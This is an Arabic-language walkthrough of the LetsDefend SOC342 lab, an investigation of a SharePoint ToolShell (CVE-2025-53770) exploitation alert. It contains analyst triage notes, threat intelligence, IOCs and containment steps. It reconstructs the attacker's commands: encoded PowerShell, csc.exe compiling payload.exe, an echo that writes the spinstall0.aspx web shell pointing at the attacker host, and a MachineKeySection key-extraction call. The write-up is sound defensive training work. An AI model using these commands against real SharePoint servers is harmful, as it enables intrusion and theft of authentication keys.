شرح خطوة بخطوة لمختبر LetsDefend SOC342 يحلل CVE-2025-53770 تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد في SharePoint ToolShell، بما في ذلك سلسلة الهجوم والتحليل الجنائي وإجراءات الاحتواء.
قمت بالتحقيق في ثغرة يوم صفر في SharePoint تُسمى ToolShell (CVE-2025-53770) في المختبر السيبراني LetsDefend.
حاكى التمرين هجوم RCE حقيقي من نوع اليوم صفر حيث تجاوز طلب POST خبيث المصادقة، ونفّذ PowerShell لسرقة مفاتيح MachineKeySection، وجمّع payload.exe، وأسقط ويب شيل خبيثًا (spinstall0.aspx).
يوثق هذا README عملية الهجوم، وخطوات التحليل الجنائي، وإجراءات الاحتواء، والدروس المستفادة.
| الحقل | التفاصيل |
|---|
| المنصة | LetsDefend Cyber Range |
| الهدف | SharePoint Server (SharePoint01) |
| CVE | CVE-2025-53770 |
| الغاية | تحليل RCE، وممارسة الاكتشاف والاحتواء |
| الأدوات المستخدمة | Windows PowerShell, VirusTotal, AbuseIPDB, Talosintelligence, LetsDefend Log Management, LetsDefend Endpoint Security, Base64 Decoder, LetsDefend Threat Intel |
رصد تنبيه حرج نشاطًا مشبوهًا يستهدف ToolPane.aspx في SharePoint بحمولة كبيرة وReferer مزيف.
يرتبط هذا بـ CVE-2025-53770، وهي ثغرة يوم صفر تسمح بـ RCE غير مصادق عبر طلبات POST مصممة بعناية.

ما هو: مستوى الخطورة المخصص لهذا التنبيه — الأعلى والأكثر إلحاحًا.
لماذا هو مهم: يشير إلى أن هذا الحدث قد يؤدي إلى اختراق كامل للنظام (RCE). عالجه كأولوية قصوى: اعزل وحقق فورًا.
ما هو: الطابع الزمني عند إطلاق التنبيه.
لماذا هو مهم: استخدمه لتحديد موقع السجلات، وربط الأحداث ذات الصلة، وبناء خط زمني (ابحث ± بضع دقائق أو ساعات).
ما هو: قاعدة أو توقيع الاكتشاف الذي انطلق، ويصف الشرط المطابق (محاولة استغلال ToolShell).
لماذا هو مهم: يحدد نمط الهجوم الذي تم اكتشافه — مفيد للبحث عن حالات مشابهة (مثل طلبات POST غير مصادقة لصفحات إدارية أو رفع ويب شيل محتمل).
ما هو: معرّف رقمي لحالة التنبيه أو القاعدة هذه (معرّف من البائع).
لماذا هو مهم: يساعد في التتبع، والتصفية، والإشارة إلى هذا التنبيه في التذاكر أو التقارير.
ما هو: تصنيف عالي المستوى — هذا التنبيه يستهدف البنية التحتية للويب.
لماذا هو مهم: يوجّه الحادث إلى فريق الويب/SharePoint/البنية التحتية ويطبّق دليل الاستجابة الخاص بالويب.
ما هو: دور المحلل أو مستوى التصعيد المتوقع للتعامل مع التنبيه.
لماذا هو مهم: يشير إلى أن هذا ليس تنبيهًا من المستوى الأول (Tier-1) — يتطلب محللًا أمنيًا (مستجيبًا متمرسًا) لاتخاذ إجراء فوري.
ما هو: اسم المضيف المتأثر (الهدف أو مصدر النشاط).
لماذا هو مهم: هذا هو الهدف الأساسي للاحتواء — اعزل، واجمع الأدلة، وراقب هذا النظام أولًا.
ما هو: عنوان الـ IP الذي أرسل الطلب المشبوه (المهاجم أو وكيل).
لماذا هو مهم: احجبه عند جدار الحماية/WAF، وابحث عن أي نتائج أخرى منه، وتحقق من معلومات الملكية/الجغرافيا. ملاحظة: يمكن تزوير عناوين IP أو تكون جزءًا من شبكات بوت نت.
ما هو: عنوان الـ IP الداخلي المستهدف (SharePoint01).
لماذا هو مهم: يؤكد النظام الداخلي الذي تم استهدافه — اربطه باسم المضيف وراجع مسارات الوصول الداخلية/قواعد جدار الحماية.
ما هو: فعل HTTP المستخدم — أرسل العميل بيانات إلى الخادم.
لماذا هو مهم: طلبات POST إلى نقاط نهاية إدارية مشبوهة عندما تكون غير مصادقة أو كبيرة — يمكن أن تحمل حمولات استغلال أو ويب شيلز.
/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
ما هو: مسار الويب والمعاملات الدقيقة المستهدفة.
لماذا هو مهم: هذه نقطة نهاية إدارية/تخطيطات في SharePoint — يساء استخدامها غالبًا من قبل المهاجمين لـ تجاوز المصادقة أو رفع الأكواد. ابحث عن طلبات أخرى لنفس المسار.
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
ما هو: سلسلة المتصفح التي يرسلها العميل.
لماذا هو مهم: غالبًا ما يتم تزويرها من قبل المهاجمين لتبدو شرعية — يمكن أن تساعد في تصفية السجلات، لكن لا تعتمد عليها للإسناد.
/_layouts/SignOut.aspx
ما هو: ترويسة HTTP تدّعي أن الطلب جاء من صفحة تسجيل الخروج في SharePoint.
لماذا هو مهم: المرجعيات المزيفة مشبوهة — قد تُستخدم لتجاوز الفحوصات أو لمحاكاة الحركة العادية. قارنها بتدفقات التنقل الشرعية.
7699ما هو: حجم جسم طلب HTTP (بالبايت).
لماذا هو مهم: جسم POST كبير إلى نقطة نهاية إدارية يوحي بـ استغلال متسلسل أو رفع ملف. ابحث عن طلبات POST أخرى بحجم مماثل لنفس الرابط.
النص: طلب POST غير مصادق مشبوه يستهدف ToolPane.aspx بحجم حمولة كبير ومرجع مزيف — مؤشر على استغلال CVE-2025-53770.
ما هو: شرح القاعدة الذي يلخص السلوك المطابق.
لماذا هو مهم: يصف بالضبط لماذا انطلق التنبيه — تحقق مما إذا كان الطلب غير مصادق، وما الحمولة التي أُرسلت، وما إذا كان يطابق أنماط الاستغلال المعروفة.
ما هو: يشير إلى استجابة الجهاز الحامي (مثل WAF/جدار الحماية).
لماذا هو مهم: نظرًا لأنه كان مسموحًا، فإن الهجوم وصل إلى المضيف — تعامل معه كاختراق محتمل.
إجراءات فورية:
107.191.58.76)SharePoint01)🔎 ملخص:
يعكس هذا التنبيه محاولة استغلال غير مصادقة تستهدف ToolPane.aspx (ثغرة RCE في SharePoint CVE-2025-53770). احتوى طلب POST على حمولة كبيرة ومرجع مزيف، بما يتوافق مع سلوك استغلال ToolShell من نوع اليوم صفر. نظرًا لأن الجهاز سمح بالطلب، افترض اختراقًا محتملًا حتى يثبت العكس. 🟥 الخطورة: حرجة
ابحث في IIS/WAF عن طلبات POST إلى ToolPane.aspx (حوالي 2025-07-22 13:07):
Select-String -Path "C:\inetpub\logs\LogFiles\**\*.log" -Pattern "/_layouts/15/ToolPane.aspx" | Out-File .\IIS_ToolPane_hits.txt
اسحب جسم POST الكامل من WAF/الوكيل أو من التقاط الحزم واحفظه في مشاركة جنائية.
ابحث عن ملفات ASPX جديدة/معدلة في جذر الويب (ويب شيلز):
Get-ChildItem "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\**\*.aspx" -Recurse | Sort LastWriteTime -Desc | Select FullName,LastWriteTime
احجب المهاجم واعزل المضيف: احجب 107.191.58.76 عند الحدود/WAF وانقل SharePoint01 إلى الحجر الصحي (أو قيّد الاتصالات الصادرة).
لا تحذف الملفات المشتبه بها — اصنع نسخًا جنائية أولًا.
Microsoft SharePoint هو منصة تعاون وإدارة مستندات.
يوفر تخزين ملفات آمنًا، والتحكم في الإصدارات، وبوابات إنترانت، ومتكامل مع Active Directory وTeams وOutlook وPower BI.
ثغرة RCE غير مصادقة حرجة في Microsoft SharePoint Server تستغل إلغاء التسلسل غير الآمن.
يستخدمها المهاجمون من أجل:
🧮 درجة CVSS: 9.8 (حرجة)
📡 الاستغلال: نشط في البرية
IP المصدر: 107.191.58.76
🧩 النتيجة: 15/95 من بائعي الأمان أشاروا إليه كخبيث.

تم التحقق عبر AbuseIPDB — الـ IP مرتبط بـ:

تم التحقق عبر Talos Intelligence — خصائص الـ IP/الشبكة الفرعية:
*.vultrusercontent.com
حددت موقع المضيف SharePoint01 في Endpoint Security.
فحصت سجل الطرفية (Terminal History) بحثًا عن أوامر مشبوهة.

يُظهر هذا السجل أنه في الساعة 13:07:11، تم تشغيل عملية PowerShell ضمن تجمع تطبيقات SharePoint، ونفّذت أمرًا مشفرًا بـ Base64. كانت العملية الأصلية services.exe، واستهدف الهجوم أدلة SharePoint. هذا مؤشر واضح على استغلال ToolShell وتنفيذ كود عن بُعد داخل خادم SharePoint.
-nop = -NoProfile: تشغيل PowerShell بدون تحميل ملف تعريف المستخدم (يتجنب الاكتشاف المعتمد على الملفات الشخصية، ويعمل أسرع).-w hidden = -WindowStyle Hidden: التشغيل بدون إظهار نافذة (تخفي).-e = -EncodedCommand: السلسلة التالية هي محتوى PowerShell مشفر بـ Base64 (عادةً UTF-16LE أو أحيانًا UTF-8) — يُستخدم لإخفاء الكود من الفحص العرضي والسجلات البسيطة.<BASE64>: حمولة Base64 طويلة — عند فك تشفيرها تحتوي على سكربت ASPX من جانب الخادم (يبدو كويب شيل) يقرأ قيم MachineKey.

⚙️ ملخص السلوك
يشير هذا إلى سرقة MachineKey لتزوير ViewState/رموز المصادقة — استغلال ToolShell كلاسيكي.

🧩 النتيجة: قام المهاجم بتجميع payload.cs إلى payload.exe باستخدام مترجم .NET المدمج → برمجية خبيثة على الأرجح.
ما يفعله هذا حرفيًا (خطوة بخطوة):
csc.exe → مترجم C# المرفق مع .NET Framework./out:C:\Windows\Temp\payload.exe → يخبر المترجم أين يحفظ البرنامج المترجم وما الاسم الذي سيُعطى له (payload.exe).C:\Windows\Temp\payload.cs → ملف المصدر C# (كود قابل للقراءة البشرية) يحوله المترجم إلى برنامج قابل للتشغيل.لماذا هذا خطير (شرح للمبتدئين):
.cs) إلى ملف قابل للتنفيذ (.exe) على جهاز الضحية.payload.exe) تنفيذ أي إجراءات برمجها المهاجم: فتح اتصالات شبكة، إطلاق شيلات، تثبيت آليات الثبات، أو سرقة بيانات.كيف استخدمه المهاجم على الأرجح في سلسلة الهجوم:
payload.cs أو رفعه.payload.exe ليتمكن من تشغيله كبرنامج أصلي على الخادم.أدلة للبحث عنها (ماذا تبحث في السجلات/الملفات):
csc.exe بمعاملات تشير إلى payload.cs أو /out:C:\Windows\Temp\payload.exe.C:\Windows\Temp\payload.cs و C:\Windows\Temp\payload.exe (اجمع نسخًا جنائية واحسب التجزئات).w3wp.exe / powershell.exe / cmd.exe وهي تُطلق csc.exe.payload.exe إذا تم تنفيذه.ملخص من سطر واحد (للـ README / التذكرة):
استخدم المهاجم مترجم C# الخاص بـ .NET (csc.exe) لتجميع payload.cs إلى payload.exe على المضيف — مما أنشأ ملفًا تنفيذيًا أصليًا لنشاط خبيث لاحق.

🧩 النتيجة: إنشاء spinstall0.aspx داخل دليل LAYOUTS في SharePoint → باب خلفي يمكن الوصول إليه عبر الويب.
ما يفعله هذا حرفيًا (خطوة بخطوة، بلغة بسيطة):
cmd.exe /c → يبدأ شيل أوامر Windows لتشغيل أمر واحد ثم الخروج.echo <...> > "...\spinstall0.aspx" → يطبع نص HTML/ASPX المقدم ويكتبه في الملف spinstall0.aspx (عامل > ينشئ الملف أو يستبدله).runat="server" → يجعل الملف ASPX من جانب الخادم، بحيث ينفذه IIS/SharePoint داخل عملية تطبيق الويب بدلًا من تقديمه كنص ثابت.<object> يحتوي على Url="http://107.191.58.76/payload.exe" → يوجّه الصفحة (أو الخادم عند التنفيذ) لجلب payload.exe الخاص بالمهاجم من المضيف البعيد.لماذا هذا خطير (شرح للمبتدئين):
كيف استخدمه المهاجم على الأرجح في سلسلة الهجوم:
spinstall0.aspx في مجلد LAYOUTS في SharePoint.payload.exe من مضيف المهاجم.أدلة للبحث عنها (ماذا تبحث في السجلات/الملفات):
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx — اجمع نسخة جنائية واحسب SHA256.cmd.exe وهو يكتب إلى ذلك المسار.spinstall0.aspx أو طلبات صادرة إلى http://107.191.58.76/payload.exe.spinstall0.aspx (مما يشير إلى تنزيل/تنفيذ حمولة).ملخص من سطر واحد (للـ README / التذكرة):
أنشأ المهاجم ويب شيل ASPX من جانب الخادم (spinstall0.aspx) في مجلد LAYOUTS في SharePoint يوجّه الخادم لجلب/تشغيل payload.exe من البنية التحتية للمهاجم — باب خلفي عن بُعد دائم.

🧩 النتيجة: تنفيذ PowerShell لقراءة وتسريب إعدادات MachineKey — شرط مسبق مباشر لـ RCE.
ما يفعله هذا حرفيًا (خطوة بخطوة):
powershell.exe → شيل السكربت في Windows.-Command يخبر PowerShell بتنفيذ التعبير التالي.[System.Web.Configuration.MachineKeySection]::GetApplicationConfig() يستدعي .NET لاسترداد كائن إعداد machineKey الخاص بـ ASP.NET (يتضمن ValidationKey وDecryptionKey والإعدادات ذات الصلة).لماذا هذا خطير (شرح للمبتدئين):
machineKey أسرارًا يستخدمها ASP.NET من أجل:
ViewState وملفات تعريف الارتباط للمصادقة النماذجية (forms-auth).ValidationKey/DecryptionKey، يمكنه:
ViewState موقع أو ملفات تعريف ارتباط مصادقة، أو فك تشفير الرموز.كيف استخدمه المهاجم على الأرجح في سلسلة الهجوم:
ToolPane.aspx لتشغيل كود داخل عملية تطبيق SharePoint.ValidationKey / DecryptionKey.ViewState خبيث) أو ملفات تعريف ارتباط مصادقة صالحة لتصعيد الوصول.أدلة للبحث عنها (ماذا تبحث في السجلات/الملفات):
powershell.exe مع GetApplicationConfig أو MachineKeySection في سطر الأوامر.ValidationKey / DecryptionKey).MachineKeySection / GetApplicationConfig.IIS APPPOOL\SharePoint) في نفس الطوابع الزمنية.ملخص من سطر واحد (للـ README / التذكرة):
نفذ المهاجم PowerShell لاستدعاء System.Web.Configuration.MachineKeySection::GetApplicationConfig() — محاولًا تسريب machineKey الخاص بـ ASP.NET (ValidationKey/DecryptionKey)، مما يتيح تزوير الرموز وتجاوز المصادقة.
المصدر: LetsDefend Threat Intel (تم الاستعلام بواسطة IP 107.191.58.76)
Referer: /_layouts/SignOut.aspx.
| النوع | المؤشر | الوصف |
|---|---|---|
| IP | 107.191.58.76 | عنوان IP المصدر للمهاجم الذي يرسل طلبات POST للاستغلال |
| URL | /_layouts/15/ToolPane.aspx?DisplayMode=Edit | نقطة نهاية الاستغلال |
| File | spinstall0.aspx | ويب شل ASPX خبيث تم نشره |
| String | MachineKeySection | دليل على محاولة استخراج machineKey |
Victorتم اكتشاف استغلال يوم الصفر ToolShell (CVE‑2025‑53770) ضد SharePoint المحلي (SharePoint01). تجاوز المهاجم (IP 107.191.58.76) المصادقة ونفّذ إجراءات متعددة ما بعد الاستغلال:
spinstall0.aspx (ويب شل) إلى دليل LAYOUTS في SharePoint.payload.exe محليًا باستخدام مترجم .NET C#.

الخلاصة: تأكيد الاختراق — نشر ويب شل، واستخراج المفاتيح، وتجميع الحمولة على المضيف.
SharePoint01 (VLAN عزل) أو حظر عناوين IP الخاصة بالمهاجم عند المحيط/WAF/جدار الحماية.spinstall*.aspx وpayload.exe (باسم الملف/التجزئة) واستخدام GetApplicationConfig/MachineKeySection.spinstall0.aspx والمهام/الخدمات المجدولة غير المصرح بها وأي برمجيات خبيثة تم اكتشافها (بعد جمع النسخ الجنائية).machineKey (بالتنسيق مع مالكي التطبيقات) وطبّق تصحيحات الطوارئ لشهر يوليو 2025 من Microsoft على جميع مثيلات SharePoint المحلية.-EncodedCommand / -e) على خوادم الويب.csc.exe لتجميع أكواد في C:\Windows\Temp على مضيفات الويب.POST الكبيرة غير المصادق عليها إلى ToolPane.aspx عبر قواعد WAF.csc.exe, cmd.exe, powershell.exe) في مرحلة ما بعد الاستغلال؛ راقب الاستخدام غير المتوقع على خوادم الويب.SharePoint01 واحظر 107.191.58.76.spinstall0.aspx وpayload.cs وpayload.exe (احتفظ بالطوابع الزمنية).w3wp.exe / payload.exe للتحليل.machineKey والبيانات المعتمدة المتأثرة بعد جمع الأدلة.